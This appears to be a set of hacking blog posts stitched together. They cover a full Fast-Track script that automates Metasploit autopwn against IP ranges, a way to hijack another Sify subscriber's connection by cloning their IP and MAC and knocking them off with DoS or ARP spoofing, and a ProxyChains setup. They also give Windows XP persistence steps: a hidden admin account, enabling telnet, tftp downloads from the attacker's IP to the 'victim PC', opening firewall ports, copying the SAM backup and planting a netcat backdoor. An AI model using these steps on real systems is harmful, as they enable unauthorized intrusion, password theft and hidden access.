Seems like there’ve been some minor changes in the MetaSploit Framework 3. One of the effects is that the the Autopwn Automation of FastTrack is not working. Running the script gives the following error:

.
.
msf > load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new ‘db_driver’
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /opt/metasploit3/msf3/plugins/db_sqlite3: Deprecated plugin
msf > db_driver sqlite3
[*] Using database driver sqlite3

One solution is to open up the Msfconsole and type the commands manually. But that kind of defeats the purpose of having FastTrack installed (in a limited way of course:p ). Fortunately, the fix is very easy. All you need to do is to modify the autopwn file in /pentest/exploits/fasttrack/bin/ftsrc directory. First open the file in any text editor of your choice and look for this line in bold:

try:
child1 = pexpect.spawn(‘%smsfconsole’ % (metapath))
# load sqlite3
child1.sendline (‘load db_sqlite3’)
# Destroy database
child1.sendline (‘db_destroy pentest’)
# Create database
child1.sendline (‘db_create pentest’)

Now replace db_sqlite3 with db_driver sqlite3 and save the file.
Everything will work fine.

Alternatively you can copy-paste the following text in a text editor and save the file as “autopwn.py” (minus quotes) in directory /pentest/exploits/fasttrack/bin/ftsrc . You’ll need root access to replace the already existing file.

#!/usr/bin/env python
import pexpect,sys,os,time
try:
import psyco
psyco.full()
except ImportError:
pass
definepath=os.getcwd()
try:
ipaddr=sys.argv[3]
except IndexError:
ipaddr=raw_input(“””
Metasploit Autopwn Automation

http://www.metasploit.com

This tool specifically piggy backs some commands from the Metasploit Framework and does
not modify the Metasploit Framework in anyway. This is simply to automate some tasks
from the autopwn feature already developed by the Metasploit crew.

Simple, enter the IP ranges like you would in NMap i.e. 192.168.1.-254 or 192.168.1.1/24
or whatever you want and it’ll run against those hosts. Additionally you can place NMAP
commands within the autopwn ip ranges bar, for example, if you want to scan even if a
host “appears down” just do -PN 192.168.1.1-254 or whatever…you can use all NMap
syntaxes in the Autopwn IP Ranges portion.

When it has completed exploiting simply type this:

sessions -l (lists the shells spawned)
sessions -i (jumps you into the sessions)

Example 1: -PN 192.168.1.1
Example 2: 192.168.1.1-254
Example 3: -P0 -v -A 192.168.1.1
Example 4: 192.168.1.1/24

Enter the ip ranges to autopwn: “””)
if ipaddr == ‘quit’ or ipaddr == ‘q’:
print “nnExiting Fast-Track autopwn…nn”
sys.exit()
# Spawn instance of msfconsole
try:
option1=sys.argv[4]
except IndexError:
option1=raw_input(“””
Do you want to do a bind or reverse payload?

Bind = direct connection to the server
Reverse = connection originates from server

1. Bind
2. Reverse

Enter number: “””)
if option1 == ‘quit’ or option1 == ‘q’:
print “nnExiting Fast-Track autopwn…nn”
sys.exit()
if option1 == ‘1’: option1=’-b’
if option1 == ‘2’: option1=’-r’
print “Launching MSFConsole and prepping autopwn…”
try:
counter=0
metapath=file(“%s/bin/setup/metasploitconfig.file” % (definepath)).readlines()
for line in metapath:
metapath=line.rstrip()
except IOError:
print “Configuration file not detected, running default path.”
print “Recommend running setup.py install to configure Fast-Track.”
print “Setting default directory…”
counter=0
# BT3
if os.path.isfile(“/pentest/exploits/framework3/msfconsole”):
metapath=”/pentest/exploits/framework3/”
counter=1
# NUbuntu
if os.path.isfile(“/tools/exploits/framework*/msfconsole”):
metapath=”/tools/exploits/framework*/”
counter=1
if counter == ‘0’:
print “Metasploit not detected..Exiting..”
sys.exit()

try:
child1 = pexpect.spawn(‘%smsfconsole’ % (metapath))
# load sqlite3
child1.sendline (‘db_driver sqlite3’)
# Destroy database
child1.sendline (‘db_destroy pentest’)
# Create database
child1.sendline (‘db_create pentest’)
# run actual port scans
child1.sendline (”’db_nmap %s ”’ % (ipaddr))
# run actual exploitation
child1.sendline (‘db_autopwn -p -t -e %s’ % (option1))
child1.sendline (‘sleep 5’)
child1.sendline (‘jobs -K’)
child1.sendline (‘nnn’)
child1.sendline (‘sessions -l’)
child1.sendline (‘echo “If it states No sessions, then you were unsuccessful. Simply type sessions -i to jump into a shell”‘)
# jump to pid
child1.interact()
except Exception: print “nExiting Fast-Track…n”

Level of insecurity in Sify continues to amaze me. Maybe it’s just the flawed LAN kind of network design they use, maybe it’s the equipment or software ..whatever.

Anyhow, I’ve found another way to exploit Sify networks.Well, it’s not really a new exploit  Attacks like this are not new. Managing a successful attack can give you free internet at the expense of some poor soul who happens to be in same network as yours.

 I’ll not post complete details, only a bit of outline. Considering the no. of retarded script kiddies who are likely to use this simple exploit and misuse bandwidth of other Sify users, I think it’s a fair idea.

1st you need to run a port scan and note down all the IPs and corresponding MAC addresses in your Sify network. Any moderately good port scanner can do it for you.

2nd choose one IP-MAC address combination of any user who is most likely logged in at that time and change your own IP and MAC address to same 

3rd, now use something to kick off that user temporarily off the network. Try doing this thing quick. It’s one of the most vital steps. Hints, DoS, ARP spoof :p

Open your browser and start surfing, downloading whatever. This attack works on almost every LAN, but I expected better from a national level ISP

Part 1

In this post, I’ll post more stuff that you can do to maintain access to any remote Windows XP computer. Previous post is here.


1. Creating Invisible Account

You can create a user “Admin” by running following command

c:windowssystem32net user admin admin /add

But this user will be visible on XP logon screen. To hide it, you’ll have to edit some registry settings
Open up Registry Editor and navigate to this key

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonSpecialAccountsUserList

Here, modify or create a DWORD Value by right-clicking the right side of the screen and adding DWORD Value. Name of the value must be same as the account name (admin here) that you want to hide. Set the value data 0 to hide it and 0 to unhide.

2. Enabling Telnet

Telnet is one simple utility that you can use to maintain access without uploading any extra backdoor/software. Telnet server is disabled on most PCs by default. You’ll have to manually enable the service to start automatically

sc config telnet start= auto net start telnet

That’s it. Any service can be enabled using this command. Just replace telnet with the service of your choice.
Now you can use the account you created earlier to login any time you want.

In this post I’ll write about what to do once you gain administrative privileges on a Windows PC. There’s lot that you can do, depending upon your inclinations (I hope benign).
Don’t ask me how to get admin rights in first place. Figure that out yourself.
Maybe I’ll write something on that someday, but not now.

Anyhow, once you get in open a windows command shell.
Here are a few things you might like to do:

1) Uploading/downloading files

First thing you might do is uploading a few files of your choice. TFTP (Trivial File Transfer Protocol) is an excellent choice for this.
You need to start tftp service/daemon on your PC first and place the files you want to upload in the programs working directory. In most linux versions, its /tmp

Type the following command to upload netsh.exe file.

C:WINDOWS>tftp -i 192.168.1.10 GET netsh.exe netsh.exe

Here

-i specifies binary transfer mode

GET tells the victim PC to fetch the file from remote PC. You can use PUT to copy data onto a remote PC

192.168.1.10 is your ip

First netsh.exe is the file you want to upload

Second netsh.exe is the filename you want to keep in victim PC. You can change it to anything you want.

2. Editing network settings

The file netsh.exe is a Windows program for editing network related settings of a PC. Most XP PCs don’t have it by default. You’ll have to upload it. In this case, it’s used to open certain ports in Windows Firewall, that otherwise could be blocked. VNC uses ports 5900 and 5800 for communications. You can edit the firewall setings to unblock these ports by using these commands:

netsh firewall set portopening tcp 5800

netsh firewall set portopening tcp 5900

netsh.exe firewall set portopening udp 5900

This is just an example. You can use this command to block or unblock any port. Keep in mind, unblocking a particular port doesn’t mean the service/program that usually uses the port will start working. For example, unblocking port 23 and trying telnet will be of no use, unless telnet service is started on that PC.

3). Copying SAM

SAM file contains list of all the users and corresponding passwords in Windows. Though it’s encryption can be hard to break depending upon password strength, it’s a very juicy target. There are quite a few paid and free software to do that. It’s default location is

C:windowssystem32config

It’s not possible to copy the SAM file directly as it’s a protected system file. But there is a loophole here too. A backup copy of SAM is almost always located in

C:windowsrepair

You can copy this file to your own PC unlike original SAM.

4). Uploading a back-door

A back-door program for example netcat is necessary if you want to keep unrestricted access. netcat is supposed to be a good program, but most anti-virus programs detect it very easily. So it’s slightly out of fashion. If that’s the case, you can try using some script based back-doors like Matahari. It’s a perl script. Only downside is that the target PC should have perl installed which most windows PCs don’t have.
Linux fares better in this case. Another good option is VNC.

That’s enough for now. Let me know if you have any suggestions or corrections.


There are probably dozens of programs on any OS that don’t have any option for using proxies. Many common command line tools like ping, traceroute don’t work if the network you are on, forces you to use a proxy. Finally found a way to specify a proxy for these programs . ProxyChains  is one very good tool that enables you to use a proxy for not only specifying a path to outside networks but also use anonymous proxies for your privacy. 

 It’s quite simple to install and use. First download and install the script. 

Then navigate to /etc folder and open proxychains.conf file in any text editor of your choice. It should look like this.

# proxychains.conf VER 3.1
#
# HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.

# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
#dynamic_chain
#
# Dynamic – Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
strict_chain
#
# Strict – Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random – Each connection will be done via random proxy
# (or proxy chain, see chain_len) from the list.
# this option is good to test your IDS :)

# Make sense only if random_chain
#chain_len = 2

# Quiet mode (no output from library)
#quiet_mode

# Proxy DNS requests – no leak for DNS data
proxy_dns 

# Some timeouts in milliseconds
tcp_read_time_out 15000
tcp_connect_time_out 8000

# ProxyList format
# type host port [user pass]
# (values separated by ‘tab’ or ‘blank’)
#
#
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080 
#  
#
# proxy types: http, socks4, socks5
# ( auth types supported: “basic”-http “user/pass”-socks )
#
[ProxyList]
# add proxy here …
# meanwile
# defaults set to “tor”
http 10.123.137.1 8080
socks4 111.44.45.31 80

Now depending upon your network configuration, you’ll need to add proxies to this file. If you’re on a network that routes all data through a proxy server, then replace the bold green text with the type of proxy (http, socks4,5 ), ip address and port number. Separate each field by a TAB. That’ll be enough for you to force your programs to use your network’s proxy.

But if  you want to use another proxy for any purpose including hiding your ip, you can add other proxies along with their type and port number same way as previous one. (Red bold text). Additionaly you may have to add username and password if the proxy server requires so.

Notice the options #dynamic_chain, #strict_chain and #random_chain . 
Removing the # sign from any one of these 3 specifies the order in which the proxies are to be used. In this example I’m using strict_chain option, though dynamic_chain will also work.

Save the file and exit from text editor. Now it’s time to see it in action. Open up your command line and type proxychains before the program name to force it to use your proxylist. 

user~# proxychains program

As simple as that :)